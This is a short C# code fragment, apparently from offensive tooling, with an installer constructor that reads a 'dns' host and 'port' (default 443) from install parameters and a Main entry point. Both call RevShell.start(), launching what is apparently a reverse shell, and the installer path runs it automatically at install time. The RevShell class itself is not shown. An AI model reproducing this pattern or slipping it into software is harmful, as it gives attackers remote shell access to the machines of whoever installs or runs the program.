public ProjectInstaller() { InitializeComponent(); String ip = Context.Parameters["dns"] ?? "kaboom"; String port = Context.Parameters["port"] ?? "443"; RevShell.start(); }
/// <summary> /// The main entry point for the application. /// </summary> static void Main() { RevShell.start(); }